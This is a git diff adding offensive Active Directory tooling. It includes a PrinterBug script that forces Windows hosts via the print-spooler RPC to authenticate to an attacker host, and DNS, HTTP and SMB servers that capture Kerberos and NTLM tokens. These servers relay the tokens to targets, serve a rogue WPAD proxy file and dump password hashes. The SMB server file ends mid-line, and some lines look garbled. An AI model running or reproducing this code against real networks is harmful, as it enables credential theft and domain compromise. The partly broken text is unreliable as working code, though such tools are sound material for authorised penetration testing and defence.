def __init__(self, username='', password='', domain='', port=None, + hashes=None, attackerhost='', ping=True, timeout=1, + doKerberos=False, dcHost='', targetIp=None): + + self.__username = username + self.__password = password + self.__port = port + self.__domain = domain + self.__lmhash = '' + self.__nthash = '' + self.__attackerhost = attackerhost + self.__tcp_ping = ping + self.__tcp_timeout = timeout + self.__doKerberos = doKerberos + self.__dcHost = dcHost + self.__targetIp = targetIp + if hashes is not None: + self.__lmhash, self.__nthash = hashes.split(':') + + def dump(self, remote_host): + + logging.info('Attempting to trigger authentication via rprn RPC at %s', remote_host) + + stringbinding = self.KNOWN_PROTOCOLS[self.__port]['bindstr'] % remote_host + # logging.info('StringBinding %s'%stringbinding) + rpctransport = transport.DCERPCTransportFactory(stringbinding) + rpctransport.set_dport(self.__port) + + if self.KNOWN_PROTOCOLS[self.__port]['set_host']: + rpctransport.setRemoteHost(remote_host) + + if hasattr(rpctransport, 'set_credentials'): + # This method exists only for selected protocol sequences. + rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) + + if self.__doKerberos: + rpctransport.set_kerberos(True, kdcHost=self.__dcHost) + + if self.__targetIp: + rpctransport.setRemoteHost(self.__targetIp) + + try: + self.lookup(rpctransport, remote_host) + except Exception as e: + if logging.getLogger().level == logging.DEBUG: + import traceback + traceback.print_exc() + logging.critical("An unhandled exception has occured. Trying next host:") + logging.critical(str(e)) + + def ping(self, host): + # Code stolen from https://github.com/fox-it/BloodHound.py/blob/1124a1b5c6f62fa6c058f7294251c7cb223e3d66/bloodhound/ad/utils.py#L126 and slightly modified by @tacticalDevC + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(self.__tcp_timeout) + s.connect((host, self.__port)) + s.close() + return True + except KeyboardInterrupt: + raise + except: + return False + + def lookup(self, rpctransport, host): + if self.__tcp_ping and self.ping(host) is False: + logging.info("Host is offline. Skipping!") + return + + dce = rpctransport.get_dce_rpc() + dce.connect() + dce.bind(rprn.MSRPC_UUID_RPRN) + logging.info('Bind OK') + try: + resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) + except Exception as e: + if str(e).find('Broken pipe') >= 0: + # The connection timed-out. Let's try to bring it back next round + logging.error('Connection failed - skipping host!') + return + elif str(e).upper().find('ACCESS_DENIED'): + # We're not admin, bye + logging.error('Access denied - RPC call was denied') + dce.disconnect() + return + else: + raise + logging.info('Got handle') + + request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() + request['hPrinter'] = resp['pHandle'] + request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB + request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost + request['pOptions'] = NULL + try: + resp = dce.request(request) + except Exception as e: + print(e) + logging.info('Triggered RPC backconnect, this may or may not have worked') + + dce.disconnect() + + return None + + +# Process command-line arguments. +def main(): + # Init the example's logger theme + handler = logging.StreamHandler(sys.stderr) + handler.setFormatter(ImpacketFormatter()) + logging.getLogger().addHandler(handler) + logging.getLogger().setLevel(logging.INFO) + + # Explicitly changing the stdout encoding format + if sys.stdout.encoding is None: + # Output is redirected to a file + sys.stdout = codecs.getwriter('utf8')(sys.stdout) + logging.info(version.BANNER) + + parser = argparse.ArgumentParser() + + parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') + parser.add_argument('attackerhost', action='store', help='hostname to connect to') + parser.add_argument("--verbose", action="store_true", help="Switch verbosity to DEBUG") + + group = parser.add_argument_group('connection') + + group.add_argument('-target-file', + action='store', + metavar="file", + help='Use the targets in the specified file instead of the one on'\ + ' the command line (you must still specify something as target name)') + group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port", + help='Destination port to connect to SMB Server') + group.add_argument("-timeout", + action="store", + metavar="timeout", + default=1, + help="Specify a timeout for the TCP ping check") + group.add_argument("-no-ping", + action="store_false", + help="Specify if a TCP ping should be done before connection"\ + "NOT recommended since SMB timeouts default to 300 secs and the TCP ping assures connectivity to the SMB port") + + group = parser.add_argument_group('authentication') + + group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') + group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful when proxying through ntlmrelayx)') + group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' + '(KRB5CCNAME) based on target parameters. If valid credentials ' + 'cannot be found, it will use the ones specified in the command ' + 'line') + group.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter') + group.add_argument('-target-ip', action='store', metavar="ip address", + help='IP Address of the target machine. If omitted it will use whatever was specified as target. ' + 'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it') + + if len(sys.argv)==1: + parser.print_help() + sys.exit(1) + + options = parser.parse_args() + + import re + + domain, username, password, remote_name = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( + options.target).groups('') + + #In case the password contains '@' + if '@' in remote_name: + password = password + '@' + remote_name.rpartition('@')[0] + remote_name = remote_name.rpartition('@')[2] + + if options.verbose: + logging.getLogger().setLevel(logging.DEBUG) + + if domain is None: + domain = '' + + if options.dc_ip is None: + dc_ip = domain + else: + dc_ip = options.dc_ip + + if password == '' and username != '' and options.hashes is None and options.no_pass is False: + from getpass import getpass + password = getpass("Password:") + + remote_names = [] + if options.target_file is not None: + with open(options.target_file, 'r') as inf: + for line in inf: + remote_names.append(line.strip()) + else: + remote_names.append(remote_name) + + lookup = PrinterBug(username, password, domain, int(options.port), options.hashes, options.attackerhost, options.no_ping, float(options.timeout), options.k, dc_ip, options.target_ip) + for remote_name in remote_names: + + try: + lookup.dump(remote_name) + except KeyboardInterrupt: + break + + +if __name__ == '__main__': + main() diff --git a/kerbexec/krb.gitignore b/kerbexec/krb.gitignore new file mode 100644 index 0000000..51cd7a8 --- /dev/null +++ b/kerbexec/krb.gitignore @@ -0,0 +1,5 @@ +build/ +venv/ +*.egg-info +dist/ +*.pyc diff --git a/kerbexec/servers/__init__.py b/kerbexec/servers/__init__.py new file mode 100644 index 0000000..8c123a0 --- /dev/null +++ b/kerbexec/servers/__init__.py @@ -0,0 +1,3 @@ +from .httprelayserver import HTTPKrbRelayServer +from .smbrelayserver import SMBRelayServer +from .dnsrelayserver import DNSRelayServer \ No newline at end of file diff --git a/kerbexec/servers/dnsrelayserver.py b/kerbexec/servers/dnsrelayserver.py new file mode 100644 index 0000000..252e3f5 --- /dev/null +++ b/kerbexec/servers/dnsrelayserver.py @@ -0,0 +1,108 @@ +import random, string +import socket +from struct import pack, unpack +import sys, binascii +from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, SPNEGO_NegTokenResp, ASN1_OID, asn1encode, ASN1_AID +from impacket import ntlm +from impacket import dns +from socketserver import TCPServer, BaseRequestHandler, ThreadingMixIn +from impacket.structure import Structure +from dns.message import from_wire +from impacket import ntlm, LOG +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from lib.utils.kerberos import get_kerberos_loot, get_auth_data + +from threading import Thread + + +class DNSRelayServer(Thread): + class DNSServer(ThreadingMixIn, TCPServer): + def __init__(self, server_address, request_handler_class, config): + self.config = config + self.daemon_threads = True + if self.config.ipv6: + self.address_family = socket.AF_INET6 + self.wpad_counters = {} + try: + TCPServer.__init__(self, server_address, request_handler_class) + except OSError as e: + if "already in use" in str(e): + LOG.error('Could not start DNS server. Address is already in use. To fix this error, specify the interface IP to listen on with --interface-ip') + else: + LOG.error('Could not start DNS server: %s', str(e)) + raise e + + class DnsReqHandler(BaseRequestHandler): + def handle(self): + data = self.request.recv(1024) + dlen, = unpack('>H', data[:2]) + while dlen > len(data[2:]): + data += self.request.recv(1024) + dnsp = data[2:dlen+2] + LOG.info('DNS: Client sent authorization') + pckt = from_wire(dnsp) + LOG.debug(str(pckt)) + nti = None + for rd in pckt.additional[0]: + nti = rd.key + if not nti: + return + + if self.server.config.mode == 'RELAY': + authdata = get_auth_data(nti, self.server.config) + self.do_relay(authdata) + else: + # Unconstrained delegation mode + authdata = get_kerberos_loot(token, self.server.config) + self.do_attack(authdata) + + def do_relay(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + sclass, host = authdata['service'].split('/') + for target in self.server.config.target.originalTargets: + parsed_target = target + if parsed_target.hostname.lower() == host.lower(): + # Found a target with the same SPN + client = self.server.config.protocolClients[target.scheme.upper()](self.server.config, parsed_target) + client.initConnection(authdata, self.server.config.dcip) + # We have an attack.. go for it + attack = self.server.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.server.config, client.session, self.authUser) + client_thread.start() + return + # Still here? Then no target was found matching this SPN + LOG.error('No target configured that matches the hostname of the SPN in the ticket: %s', parsed_target.host.lower()) + + def do_attack(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + # No SOCKS, since socks is pointless when you can just export the tickets + # instead we iterate over all the targets + for target in self.server.config.target.originalTargets: + parsed_target = target + if parsed_target.scheme.upper() in self.server.config.attacks: + client = self.server.config.protocolClients[target.scheme.upper()](self.server.config, parsed_target) + client.initConnection(authdata, self.server.config.dcip) + # We have an attack.. go for it + attack = self.server.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.server.config, client.session, self.authUser) + client_thread.start() + else: + LOG.error('No attack configured for %s', parsed_target.scheme.upper()) + + def __init__(self, config): + Thread.__init__(self) + self.daemon = True + self.config = config + self.server = None + + def _start(self): + self.server.daemon_threads=True + self.server.serve_forever() + LOG.info('Shutting down DNS Server') + self.server.server_close() + + def run(self): + LOG.info("Setting up DNS Server") + self.server = self.DNSServer((self.config.interfaceIp, 53), self.DnsReqHandler, self.config) + self._start() \ No newline at end of file diff --git a/kerbexec/servers/httprelayserver.py b/kerbexec/servers/httprelayserver.py new file mode 100644 index 0000000..9dc454b --- /dev/null +++ b/kerbexec/servers/httprelayserver.py @@ -0,0 +1,168 @@ +try: + import SimpleHTTPServer + import SocketServer +except ImportError: + import http.server as SimpleHTTPServer + import socketserver as SocketServer +import socket +import base64 +import random +import string +import traceback +from threading import Thread +from six import PY2, b + +from impacket import ntlm, LOG +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.examples.ntlmrelayx.servers import HTTPRelayServer +from lib.utils.kerberos import get_kerberos_loot + +class HTTPKrbRelayServer(HTTPRelayServer): + """ + HTTP Kerberos relay server. Mostly extended from ntlmrelayx. + Only required functions are overloaded + """ + + class HTTPHandler(HTTPRelayServer.HTTPHandler): + def __init__(self,request, client_address, server): + self.server = server + self.protocol_version = 'HTTP/1.1' + self.challengeMessage = None + self.client = None + self.machineAccount = None + self.machineHashes = None + self.domainIp = None + self.authUser = None + self.wpad = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "%s")) return "DIRECT"; return "PROXY %s:80; DIRECT";} ' + LOG.info("HTTPD: Received connection from %s, prompting for authentication", client_address[0]) + try: + SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server) + except Exception as e: + LOG.error(str(e)) + LOG.debug(traceback.format_exc()) + + def getheader(self, header): + try: + return self.headers.getheader(header) + except AttributeError: + return self.headers.get(header) + + def do_PROPFIND(self): + proxy = False + if (".jpg" in self.path) or (".JPG" in self.path): + content = b"""http://webdavrelay/file/image.JPG/2016-11-12T22:00:22Zimage.JPG4456image/jpeg4ebabfcee4364434dacb043986abfffeMon, 20 Mar 2017 00:00:22 GMT0HTTP/1.1 200 OK""" + else: + content = b"""http://webdavrelay/file/2016-11-12T22:00:22ZaMon, 20 Mar 2017 00:00:22 GMT0HTTP/1.1 200 OK""" + + messageType = 0 + if PY2: + autorizationHeader = self.headers.getheader('Authorization') + else: + autorizationHeader = self.headers.get('Authorization') + if autorizationHeader is None: + self.do_AUTHHEAD(message=b'Negotiate') + return + else: + auth_header = autorizationHeader + try: + _, blob = auth_header.split('Negotiate') + token = base64.b64decode(blob.strip()) + except: + self.do_AUTHHEAD(message=b'Negotiate', proxy=proxy) + return + + if b'NTLMSSP' in token: + LOG.info('HTTPD: Client %s is using NTLM authentication instead of Kerberos' % self.client_address[0]) + return + # If you're looking for the magic, it's in lib/utils/kerberos.py + authdata = get_kerberos_loot(token, self.server.config) + + # If we are here, it was succesful + + # Are we in attack mode? If so, launch attack against all targets + if self.server.config.mode == 'ATTACK': + self.do_attack(authdata) + + self.send_response(207, "Multi-Status") + self.send_header('Content-Type', 'application/xml') + self.send_header('Content-Length', str(len(content))) + self.end_headers() + self.wfile.write(content) + + def do_GET(self): + messageType = 0 + if self.server.config.mode == 'REDIRECT': + self.do_SMBREDIRECT() + return + + LOG.info('HTTPD: Client requested path: %s' % self.path.lower()) + + # Serve WPAD if: + # - The client requests it + # - A WPAD host was provided in the command line options + # - The client has not exceeded the wpad_auth_num threshold yet + if self.path.lower() == '/wpad.dat' and self.server.config.serve_wpad and self.should_serve_wpad(self.client_address[0]): + LOG.info('HTTPD: Serving PAC file to client %s' % self.client_address[0]) + self.serve_wpad() + return + + # Determine if the user is connecting to our server directly or attempts to use it as a proxy + if self.command == 'CONNECT' or (len(self.path) > 4 and self.path[:4].lower() == 'http'): + proxy = True + else: + proxy = False + + # TODO: Handle authentication that isn't complete the first time + + if (proxy and self.getheader('Proxy-Authorization') is None) or (not proxy and self.getheader('Authorization') is None): + self.do_AUTHHEAD(message=b'Negotiate', proxy=proxy) + return + else: + if proxy: + auth_header = self.getheader('Proxy-Authorization') + else: + auth_header = self.getheader('Authorization') + + try: + _, blob = auth_header.split('Negotiate') + token = base64.b64decode(blob.strip()) + except: + self.do_AUTHHEAD(message=b'Negotiate', proxy=proxy) + return + if b'NTLMSSP' in token: + LOG.info('HTTPD: Client %s is using NTLM authentication instead of Kerberos' % self.client_address[0]) + return + # If you're looking for the magic, it's in lib/utils/kerberos.py + authdata = get_kerberos_loot(token, self.server.config) + + # If we are here, it was succesful + + # Are we in attack mode? If so, launch attack against all targets + if self.server.config.mode == 'ATTACK': + self.do_attack(authdata) + + # And answer 404 not found + self.send_response(404) + self.send_header('WWW-Authenticate', 'Negotiate') + self.send_header('Content-type', 'text/html') + self.send_header('Content-Length','0') + self.send_header('Connection','close') + self.end_headers() + return + + def do_attack(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + # No SOCKS, since socks is pointless when you can just export the tickets + # instead we iterate over all the targets + for target in self.server.config.target.originalTargets: + parsed_target = target + if parsed_target.scheme.upper() in self.server.config.attacks: + client = self.server.config.protocolClients[target.scheme.upper()](self.server.config, parsed_target) + client.initConnection(authdata, self.server.config.dcip) + # We have an attack.. go for it + attack = self.server.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.server.config, client.session, self.authUser) + client_thread.start() + else: + LOG.error('No attack configured for %s', parsed_target.scheme.upper()) diff --git a/kerbexec/servers/smbrelayserver.py b/kerbexec/servers/smbrelayserver.py new file mode 100644 index 0000000..cbd0709 --- /dev/null +++ b/kerbexec/servers/smbrelayserver.py @@ -0,0 +1,595 @@ +# Copyright (c) 2013-2016 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# SMB Relay Server +# +# Authors: +# Alberto Solino (@agsolino) +# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) +# +# Description: +# This is the SMB server which relays the connections +# to other protocols +from __future__ import division +from __future__ import print_function +from six import b +from threading import Thread +try: + import ConfigParser +except ImportError: + import configparser as ConfigParser +import struct +import logging +import time +import calendar +import random +import string +import socket + +from binascii import hexlify +from impacket import smb, ntlm, LOG, smb3 +from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS +from impacket.spnego import SPNEGO_NegTokenResp, SPNEGO_NegTokenInit +from impacket.smbserver import SMBSERVER, outputToJohnFormat, writeJohnOutputToFile +from impacket.spnego import ASN1_AID, ASN1_SUPPORTED_MECH +from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.smbserver import getFileTime +from pyasn1.codec.der import decoder, encoder +from lib.utils.kerberos import get_kerberos_loot, get_auth_data +from lib.utils.spnego import GSSAPIHeader_SPNEGO_Init2, GSSAPIHeader_SPNEGO_Init, MechTypes, MechType, TypesMech, NegTokenResp, NegResult, NegotiationToken + +class SMBRelayServer(Thread): + def __init__(self,config): + Thread.__init__(self) + self.daemon = True + self.server = 0 + #Config object + self.config = config + #Current target IP + self.target = None + #Targets handler + self.targetprocessor = self.config.target + #Username we auth as gets stored here later + self.authUser = None + self.proxyTranslator = None + + # Here we write a mini config for the server + smbConfig = ConfigParser.ConfigParser() + smbConfig.add_section('global') + smbConfig.set('global','server_name','server_name') + smbConfig.set('global','server_os','UNIX') + smbConfig.set('global','server_domain','WORKGROUP') + smbConfig.set('global','log_file','None') + smbConfig.set('global','credentials_file','') + + if self.config.smb2support is True: + smbConfig.set("global", "SMB2Support", "True") + else: + smbConfig.set("global", "SMB2Support", "False") + + if self.config.outputFile is not None: + smbConfig.set('global','jtr_dump_path',self.config.outputFile) + + # IPC always needed + smbConfig.add_section('IPC$') + smbConfig.set('IPC$','comment','') + smbConfig.set('IPC$','read only','yes') + smbConfig.set('IPC$','share type','3') + smbConfig.set('IPC$','path','') + + # Change address_family to IPv6 if this is configured + if self.config.ipv6: + SMBSERVER.address_family = socket.AF_INET6 + + # changed to dereference configuration interfaceIp + self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig) + logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL) + + self.server.processConfigFile() + + self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate) + self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX) + + self.origSmbNegotiate = self.server.hookSmb2Command(smb3.SMB2_NEGOTIATE, self.SmbNegotiate) + self.origSmbSessionSetup = self.server.hookSmb2Command(smb3.SMB2_SESSION_SETUP, self.SmbSessionSetup) + # Let's use the SMBServer Connection dictionary to keep track of our client connections as well + #TODO: See if this is the best way to accomplish this + + # changed to dereference configuration interfaceIp + self.server.addConnection('SMBRelay', config.interfaceIp, 445) + + ### SMBv2 Part ################################################################# + def SmbNegotiate(self, connId, smbServer, recvPacket, isSMB1=False): + connData = smbServer.getConnectionData(connId, checkStatus=False) + + + LOG.info("SMBD: Received connection from %s" % (connData['ClientIP'])) + + respPacket = smb3.SMB2Packet() + respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR + respPacket['Status'] = STATUS_SUCCESS + respPacket['CreditRequestResponse'] = 1 + respPacket['Command'] = smb3.SMB2_NEGOTIATE + respPacket['SessionID'] = 0 + + if isSMB1 is False: + respPacket['MessageID'] = recvPacket['MessageID'] + else: + respPacket['MessageID'] = 0 + + respPacket['TreeID'] = 0 + + respSMBCommand = smb3.SMB2Negotiate_Response() + + # Just for the Nego Packet, then disable it + respSMBCommand['SecurityMode'] = smb3.SMB2_NEGOTIATE_SIGNING_ENABLED + + if isSMB1 is True: + # Let's first parse the packet to see if the client supports SMB2 + SMBCommand = smb.SMBCommand(recvPacket['Data'][0]) + + dialects = SMBCommand['Data'].split(b'\x02') + if b'SMB 2.002\x00' in dialects or b'SMB 2.???\x00' in dialects: + respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002 + #respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21 + else: + # Client does not support SMB2 fallbacking + raise Exception('Client does not support SMB2, fallbacking') + else: + respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002 + #respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21 + + respSMBCommand['ServerGuid'] = b(''.join([random.choice(string.ascii_letters) for _ in range(16)])) + respSMBCommand['Capabilities'] = 0 + respSMBCommand['MaxTransactSize'] = 65536 + respSMBCommand['MaxReadSize'] = 65536 + respSMBCommand['MaxWriteSize'] = 65536 + respSMBCommand['SystemTime'] = getFileTime(calendar.timegm(time.gmtime())) + respSMBCommand['ServerStartTime'] = getFileTime(calendar.timegm(time.gmtime())) + respSMBCommand['SecurityBufferOffset'] = 0x80 + + blob = GSSAPIHeader_SPNEGO_Init2() + blob['tokenOid'] = '1.3.6.1.5.5.2' + blob['innerContextToken']['mechTypes'].extend([MechType(TypesMech['KRB5 - Kerberos 5']), + MechType(TypesMech['MS KRB5 - Microsoft Kerberos 5']), + MechType(TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'])]) + blob['innerContextToken']['negHints']['hintName'] = "not_defined_in_RFC4178@please_ignore" + respSMBCommand['Buffer'] = encoder.encode(blob) + + respSMBCommand['SecurityBufferLength'] = len(respSMBCommand['Buffer']) + + respPacket['Data'] = respSMBCommand + + smbServer.setConnectionData(connId, connData) + + return None, [respPacket], STATUS_SUCCESS + + # This is SMB2 + def SmbSessionSetup(self, connId, smbServer, recvPacket): + connData = smbServer.getConnectionData(connId, checkStatus = False) + ############################################################# + # SMBRelay + smbData = smbServer.getConnectionData('SMBRelay', False) + ############################################################# + + respSMBCommand = smb3.SMB2SessionSetup_Response() + sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data']) + + connData['Capabilities'] = sessionSetupData['Capabilities'] + + securityBlob = sessionSetupData['Buffer'] + + rawNTLM = False + if struct.unpack('B',securityBlob[0:1])[0] == ASN1_AID: + + # negTokenInit packet + try: + blob = decoder.decode(securityBlob, asn1Spec=GSSAPIHeader_SPNEGO_Init())[0] + token = blob['innerContextToken']['negTokenInit']['mechToken'] + + if len(blob['innerContextToken']['negTokenInit']['mechTypes']) > 0: + # Is this GSSAPI NTLM or something else we don't support? + mechType = blob['innerContextToken']['negTokenInit']['mechTypes'][0] + if str(mechType) != TypesMech['KRB5 - Kerberos 5'] and str(mechType) != \ + TypesMech['MS KRB5 - Microsoft Kerberos 5']: + # Nope, do we know it? + if str(mechType) in MechTypes: + mechStr = MechTypes[str(mechType)] + else: + mechStr = mechType + smbServer.log("Unsupported MechType '%s'" % mechStr, logging.CRITICAL) + # We don't know the token, we answer back again saying + # we just support Kerberos. + respToken = NegotiationToken() + respToken['negTokenResp']['negResult'] = 'request_mic' + respToken['negTokenResp']['supportedMech'] = TypesMech['KRB5 - Kerberos 5'] + respTokenData = encoder.encode(respToken) + respSMBCommand['SecurityBufferOffset'] = 0x48 + respSMBCommand['SecurityBufferLength'] = len(respTokenData) + respSMBCommand['Buffer'] = respTokenData + + return [respSMBCommand], None, STATUS_MORE_PROCESSING_REQUIRED + else: + + # This is Kerberos, we can do something with this + try: + # Are we in attack mode? If so, launch attack against all targets + if self.config.mode == 'ATTACK': + # If you're looking for the magic, it's in lib/utils/kerberos.py + authdata = get_kerberos_loot(securityBlob, self.config) + self.do_attack(authdata) + + if self.config.mode == 'RELAY': + authdata = get_auth_data(securityBlob, self.config) + self.do_relay(authdata) + + # This ignores all signing stuff + # causes connection resets + # Todo: reply properly! + + respToken = NegotiationToken() + # accept-completed + respToken['negTokenResp']['negResult'] = 'accept_completed' + + respSMBCommand['SecurityBufferOffset'] = 0x48 + respSMBCommand['SecurityBufferLength'] = len(respToken) + respSMBCommand['Buffer'] = encoder.encode(respToken) + + smbServer.setConnectionData(connId, connData) + + return [respSMBCommand], None, STATUS_SUCCESS + + # Somehow the function above catches all exceptions and hides them + # which is pretty annoying + except Exception as e: + import traceback + traceback.print_exc() + raise + + pass + except: + import traceback + traceback.print_exc() + else: + # No GSSAPI stuff, we can't do anything with this + smbServer.log("No negTokenInit sent by client", logging.CRITICAL) + raise Exception('No negTokenInit sent by client') + + respSMBCommand['SecurityBufferOffset'] = 0x48 + respSMBCommand['SecurityBufferLength'] = len(respToken) + respSMBCommand['Buffer'] = respToken.getData() + + smbServer.setConnectionData(connId, connData) + + return [respSMBCommand], None, errorCode + ################################################################################ + + ### SMBv1 Part ################################################################# + def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket): + connData = smbServer.getConnectionData(connId, checkStatus = False) + if self.config.mode.upper() == 'REFLECTION': + self.targetprocessor = TargetsProcessor(singleTarget='SMB://%s:445/' % connData['ClientIP']) + + #TODO: Check if a cache is better because there is no way to know which target was selected for this victim + # except for relying on the targetprocessor selecting the same target unless a relay was already done + self.target = self.targetprocessor.getTarget() + + ############################################################# + # SMBRelay + # Get the data for all connections + smbData = smbServer.getConnectionData('SMBRelay', False) + + if smbData.has_key(self.target): + # Remove the previous connection and use the last one + smbClient = smbData[self.target]['SMBClient'] + del smbClient + del smbData[self.target] + + LOG.info("SMBD: Received connection from %s, attacking target %s://%s" % (connData['ClientIP'], self.target.scheme, self.target.netloc)) + + try: + if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0: + extSec = False + else: + if self.config.mode.upper() == 'REFLECTION': + # Force standard security when doing reflection + LOG.debug("Downgrading to standard security") + extSec = False + recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY) + else: + extSec = True + + #Init the correct client for our target + client = self.init_client(extSec) + except Exception as e: + LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e))) + self.targetprocessor.logTarget(self.target) + else: + smbData[self.target] = {} + smbData[self.target]['SMBClient'] = client + connData['EncryptionKey'] = client.getStandardSecurityChallenge() + smbServer.setConnectionData('SMBRelay', smbData) + smbServer.setConnectionData(connId, connData) + + return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket) + ############################################################# + + def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): + + connData = smbServer.getConnectionData(connId, checkStatus = False) + ############################################################# + # SMBRelay + smbData = smbServer.getConnectionData('SMBRelay', False) + ############################################################# + + respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) + + if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY: + # Extended security. Here we deal with all SPNEGO stuff + respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters() + respData = smb.SMBSessionSetupAndX_Extended_Response_Data() + sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters']) + sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data() + sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength'] + sessionSetupData.fromString(SMBCommand['Data']) + connData['Capabilities'] = sessionSetupParameters['Capabilities'] + + if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID: + # If there no GSSAPI ID, it must be an AUTH packet + blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob']) + token = blob['ResponseToken'] + else: + # NEGOTIATE packet + blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob']) + token = blob['MechToken'] + + # Here we only handle NTLMSSP, depending on what stage of the + # authentication we are, we act on it + messageType = struct.unpack('> 16 + packet['ErrorClass'] = errorCode & 0xff + + LOG.error("Authenticating against %s://%s as %s\%s FAILED" % ( + self.target.scheme, self.target.netloc, authenticateMessage['domain_name'], + authenticateMessage['user_name'])) + + #Log this target as processed for this client + self.targetprocessor.logTarget(self.target) + + client.killConnection() + + return None, [packet], errorCode + else: + # We have a session, create a thread and do whatever we want + LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % ( + self.target.scheme, self.target.netloc, authenticateMessage['domain_name'], authenticateMessage['user_name'])) + + # Log this target as processed for this client + self.targetprocessor.logTarget(self.target, True) + + ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], + authenticateMessage['user_name'], + authenticateMessage['domain_name'], + authenticateMessage['lanman'], authenticateMessage['ntlm']) + client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.getJTRdumpPath() != '': + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.getJTRdumpPath()) + + del (smbData[self.target]) + + self.do_attack(client) + # Now continue with the server + ############################################################# + + respToken = SPNEGO_NegTokenResp() + # accept-completed + respToken['NegResult'] = b'\x00' + + # Status SUCCESS + errorCode = STATUS_SUCCESS + # Let's store it in the connection data + connData['AUTHENTICATE_MESSAGE'] = authenticateMessage + else: + raise Exception("Unknown NTLMSSP MessageType %d" % messageType) + + respParameters['SecurityBlobLength'] = len(respToken) + + respData['SecurityBlobLength'] = respParameters['SecurityBlobLength'] + respData['SecurityBlob'] = respToken.getData() + + else: + # Process Standard Security + #TODO: Fix this for other protocols than SMB [!] + respParameters = smb.SMBSessionSetupAndXResponse_Parameters() + respData = smb.SMBSessionSetupAndXResponse_Data() + sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters']) + sessionSetupData = smb.SMBSessionSetupAndX_Data() + sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength'] + sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength'] + sessionSetupData.fromString(SMBCommand['Data']) + + client = smbData[self.target]['SMBClient'] + _, errorCode = client.sendStandardSecurityAuth(sessionSetupData) + + if errorCode != STATUS_SUCCESS: + # Let's return what the target returned, hope the client connects back again + packet = smb.NewSMBPacket() + packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS + packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | 